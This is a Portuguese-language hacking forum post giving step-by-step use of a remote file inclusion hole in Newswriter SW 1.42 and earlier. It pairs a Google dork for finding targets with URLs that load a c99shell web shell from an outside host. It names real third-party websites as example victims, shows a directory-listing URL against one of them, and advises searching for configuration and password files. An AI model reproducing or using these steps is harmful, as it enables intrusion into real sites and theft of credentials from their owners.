Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability
http://www.milw0rm.com/exploits/2439 (http://www.milw0rm.com/exploits/2439)
Primeiramente procure no google por inurl:/newswriter/ em seguida acrescente na url include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= ficando
http://www.site-vul.com/newswriter/incl ... ONF_SYSTEM (http://www.site-vul.com/newswriter/include/editfunc.inc.php?NWCONF_SYSTEM)[server_path]= cmd
uma cmd que pode ser utilizada está no endereço:
http://dot.hazard.free.fr/hacking/explo ... 9shell.txt (http://dot.hazard.free.fr/hacking/exploits/Backdoor/c99shell.txt)?
Site de exemplo:
http://www.sockenundwolle.de/newswriter ... ONF_SYSTEM (http://www.sockenundwolle.de/newswriter/include/editfunc.inc.php?NWCONF_SYSTEM)[server_path]=http://dot.hazard.free.fr/hacking/exploits/Backdoor/c99shell.txt?
o site acima não está bugado pois está sem acesso de leitura e escrita mas serve de base se estiver bugado vai aparecer vários arquivos nesse site não aparece arquivo algum então se estiver bugado basta procurar onde fica a index.html ou index.php
já o site debaixo está maiôs ou menos bugado tem permição de leitura então basta procurar por arquivos de configurações pois geralmente no fonte tem passwd ou até mesmo arquivos de passwd
http://www.welz-kg.de/newswriter/includ ... 2F&sort=0a (http://www.welz-kg.de/newswriter/include/editfunc.inc.php?NWCONF_SYSTEM%5Bserver_path%5D=http%3A%2F%2Fdot.hazard.free.fr%2Fhacking%2Fexploits%2FBackdoor%2Fc99shell.txt%3F&act=ls&d=%2Fis%2Fhtdocs%2F24107%2Fwww.welz-kg.de%2F&sort=0a)